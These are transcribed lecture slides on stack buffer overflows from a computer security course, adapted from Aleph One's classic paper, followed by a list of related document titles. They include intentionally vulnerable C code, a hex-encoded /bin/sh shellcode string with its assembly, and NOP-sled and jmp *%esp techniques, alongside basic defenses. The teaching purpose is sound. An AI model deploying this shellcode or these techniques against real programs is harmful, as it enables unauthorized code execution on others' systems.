Lecture 6: Buffer Overflow. CS 436/636/736 Spring Nitesh Saxena

Similar documents
Lecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall Nitesh Saxena

Foundations of Network and Computer Security

Buffer overflows & friends CS642: Computer Security

Buffer overflows & friends CS642: Computer Security

Foundations of Network and Computer Security

Control Hijacking Attacks

COMP 2355 Introduction to Systems Programming

Buffer Overflows. A brief Introduction to the detection and prevention of buffer overflows for intermediate programmers.

CSC 405 Computer Security Shellcode

War Industries Presents: An Introduction to Programming for Hackers Part III - Advanced Variables & Flow Control.

Foundations of Network and Computer Security

COMP 3704 Computer Security

Buffer Overflow & Format Strings

CIS 551 / TCOM 401 Computer and Network Security. Spring 2007 Lecture 2

CSE 127 Computer Security

CSE 127 Computer Security

Topics. What is a Buffer Overflow? Buffer Overflows

Buffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through to

CSE 127 Computer Security

Buffer Overflow Vulnerability

Lab 2: Buffer Overflows

We will focus on Buffer overflow attacks SQL injections. See book for other examples

HW 8 CS681 & CS392 Computer Security Understanding and Experimenting with Memory Corruption Vulnerabilities DUE 12/18/2005

CS 392/681 Lab 6 Experiencing Buffer Overflows and Format String Vulnerabilities

CS 645: Lecture 3 Software Vulnerabilities. Rachel Greenstadt July 3, 2013

Secure Systems Engineering

Security and Privacy in Computer Systems. Lecture 5: Application Program Security

CS 161 Computer Security. Week of January 22, 2018: GDB and x86 assembly

CS4264 Programming Assignment 1 Buffer Overflow Vulnerability Due 02/21/2018 at 5:00 PM EST Submit through CANVAS

Buffer Overflows. Buffer Overflow. Many of the following slides are based on those from

Secure Programming Lecture 3: Memory Corruption I (Stack Overflows)

Lecture 04 Control Flow II. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Based on Michael Bailey s ECE 422

buffer overflow exploitation

Roadmap: Security in the software lifecycle. Memory corruption vulnerabilities

Software Security II: Memory Errors - Attacks & Defenses

Buffer Overflow Vulnerability Lab

This time. Defenses and other memory safety vulnerabilities. Everything you ve always wanted to know about gdb but were too afraid to ask

1 Recommended Readings

1 Lab Overview. 2 Resources Required. CSC 666 Lab #11 Buffer Overflow November 29, 2012

CNIT 127: Exploit Development. Ch 2: Stack Overflows in Linux

X86 Review Process Layout, ISA, etc. CS642: Computer Security. Drew Davidson

Lecture 08 Control-flow Hijacking Defenses

CMPSC 497 Buffer Overflow Vulnerabilities

Linux Memory Layout. Lecture 6B Machine-Level Programming V: Miscellaneous Topics. Linux Memory Allocation. Text & Stack Example. Topics.

Buffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts

Syllabus of ENPM 691: Secure Programming in C

CS241 Computer Organization Spring 2015 IA

BUFFER OVERFLOW. Jo, Heeseung

Buffer Overflow. Jo, Heeseung

Is stack overflow still a problem?

06/21/04 15:09:12 smashing_the_stack_for_fun_and_profit.txt 1

From Over ow to Shell

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES

Reserve Engineering & Buffer Overflow Attacks. Tom Chothia Computer Security, Lecture 17

Introduction to Computer Systems , fall th Lecture, Sep. 28 th

CIS 2107 Computer Systems and Low-Level Programming Spring 2012 Final

CS155: Computer Security Spring Project #1. Due: Part 1: Thursday, April pm, Part 2: Monday, April pm.

Defending Computer Networks Lecture 2: Vulnerabili0es. Stuart Staniford Adjunct Professor of Computer Science

Architecture-level Security Vulnerabilities

Betriebssysteme und Sicherheit Sicherheit. Buffer Overflows

One-Slide Summary. Lecture Outline. Language Security

(Early) Memory Corruption Attacks

Defending Computer Networks Lecture 2: Vulnerabili0es. Stuart Staniford Adjunct Professor of Computer Science

CS642: Computer Security

Buffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.

Buffer Overflows Defending against arbitrary code insertion and execution

CSE 565 Computer Security Fall 2018

Biography. Background

Buffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University

Advanced Computer Networks Smashing the Stack for Fun and Profit

Università Ca Foscari Venezia

malloc() is often used to allocate chunk of memory dynamically from the heap region. Each chunk contains a header and free space (the buffer in which

CS , Fall 2004 Exam 1

Secure Software Development: Theory and Practice

Machine Programming 1: Introduction

Sandwiches for everyone

Format string vulnerabilities

CS 161 Computer Security

ISA 564, Laboratory I: Buffer Overflows

Security Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40

U23 - Binary Exploitation

Shell Code For Beginners

CS 33 (Week 4) Section 1G, Spring 2015 Professor Eggert (TA: Eric Kim) v1.0

Assembly Language: Function Calls

Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it

logistics LEX assignment out exam in on week come with questions on Monday (review)

CS 31: Intro to Systems Functions and the Stack. Martin Gagne Swarthmore College February 23, 2016

Advanced Security for Systems Engineering VO 05: Advanced Attacks on Applications 2

ISA564 SECURITY LAB. Shellcode. George Mason University

Final Exam. Fall Semester 2016 KAIST EE209 Programming Structures for Electrical Engineering. Name: Student ID:

Assembly Language: Function Calls" Goals of this Lecture"

CSC 591 Systems Attacks and Defenses Return-into-libc & ROP

Architecture-level Security Vulnerabilities. Julian Stecklina

CS 3214 Spring # Problem Points Min Max Average Median SD Grader. 1 Memory Layout and Locality Bill

Introduction to Operating Systems Prof. Chester Rebeiro Department of Computer Science and Engineering Indian Institute of Technology, Madras

CSc 466/566. Computer Security. 20 : Operating Systems Application Security

Buffer Overflow Attacks

Buffer Overflows. CSC 482/582: Computer Security Slide #1

Assembly Language: Function Calls" Goals of this Lecture"

Introduction to Reverse Engineering. Alan Padilla, Ricardo Alanis, Stephen Ballenger, Luke Castro, Jake Rawlins

Transcription:

Lecture 6: Buffer Overflow CS 436/636/736 Spring 2016 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit) HW3 submitted Course Admin Being graded Solution to be provided very soon HW4 will be tonight Due Apr 25 at 11am. Includes programming part related to Buffer Overflow The conceptual part, threat modeling, will be covered today You should work in teams of two each Assume teams have been formed Programming part needs demo we will do so during the exam week (Monday and Tuesday) Demo slot sign-up being Lecture 6 circulated - Buffer Overflow 1

Course Admin Final Exam Apr 28 (Thursday) 7 to 9:30pm Venue TBA (most likely the lecture room) Covers everything (cumulative) 35% -- pre mid-term material 65% -- post mid-term material Again, close-book, just like the mid-term We will do exam review Apr 20 Why study buffer overflow? Buffer overflow vulnerabilities are the most commonly exploited- account for about half of all new security problems (CERT) Are relatively easy to exploit Many variations on stack smash- heap overflows, etc. We will focus upon static buffer overflow vulnerabilities 2

Recall the Security Life Cycle Threats Which stage? Policy Specification Design Implementation Operation and Maintenance How Computer Works There is a processor that interfaces with various devices Processor executes instructions Add, sub, mult, jump and various functions 3

Where to get the instructions from Each process thinks that it has 4GB (2^32) of (virtual) memory (assuming 32-bit processor) Instructions are loaded into the memory Processor fetches and executes these instructions one by one How does the processor know where to return back after jumping and after returning from a function Process Memory Organization 4

Process Memory Organization Process Memory Organization 5

Function Calls Function Calls 6

Buffer Overflow: Example void function(char *str) { char buffer[8]; strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); } Buffer Overflows 7

Buffer Overflows Buffer Overflows 8

Buffer Overflows Buffer Overflows 9

Buffer Overflows Buffer Overflows 10

Modifying the Execution Flow void function() { char buffer1[4]; int *ret; ret = buffer1 + 8; (*ret) += 8; } void main() { int x = 0; function(); x = 1; printf("%d\n",x); } Modifying the Execution Flow 11

Modifying the Execution Flow Modifying the Execution Flow 12

Modifying the Execution Flow Exploiting Overflows - Smashing the Stack So, we can modify the flow of execution - what do we want to do now? Spawn a shell and issue commands from it 13

Exploiting Overflows - Smashing the Stack Now we can modify the flow of executionwhat do we want to do now? Spawn a shell and issue commands from it Exploiting Overflows - Smashing the Stack What if there is no code to spawn a shell in the program we are exploiting? Place the code in the buffer we are overflowing, and set the return address to point back to the buffer! 14

Exploiting Overflows - Smashing the Stack What if there is no code to spawn a shell in the program we are exploiting? Place the code in the buffer we are overflowing, and set the return address to point back to the buffer! Spawning a Shell #include <stdio.h> #include <stdlib.h> void main() { GDB char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); exit(0); } ASSEMBLY CODE 15

Spawning a Shell void main() { asm (" jmp 0x2a popl %esi movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax movl %esi,%ebx leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx int $0x80 call -0x2f.string \"/bin/sh\" "); } GDB BINARY CODE Spawning a Shell char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x 00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x8 0" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff " "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; 16

How to find Shellcode 1. Guess - time consuming - being wrong by 1 byte will lead to segmentation fault or invalid instruction How to find Shellcode 2. Pad shellcode with NOP s then guess - we don t need to be exactly on - much more efficient 17

Can we do better? If we can find the address where SP points to, we are home Can we do better? Find out what shared libaries are being used by the vulnerable program Use ldd command This also provides the starting address where the shared libraries are stored in process s memory Find out where in the shared library the instruction jmp *%esp occurs Add this to the starting address of the shared library At %esp, store the instruction jmp constant offset 18

Consider the simple program Stack Contents Normal Execution 19

Stack Contents buffer overflow How to prevent buffer overflows Programmer level: Check the length of the input Use functions strncpy (instead of strcpy) OS level: Techniques such as address space layout randomization 20

References Smashing the Stack for Fun and Profit: http://doc.bughunter.net/buffer-overflow/smash-stack.html Smashing the Modern Stack for Fun and Profit: http://netsec.cs.northwestern.edu/media/readings/modern_ stack_smashing.pdf 21

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback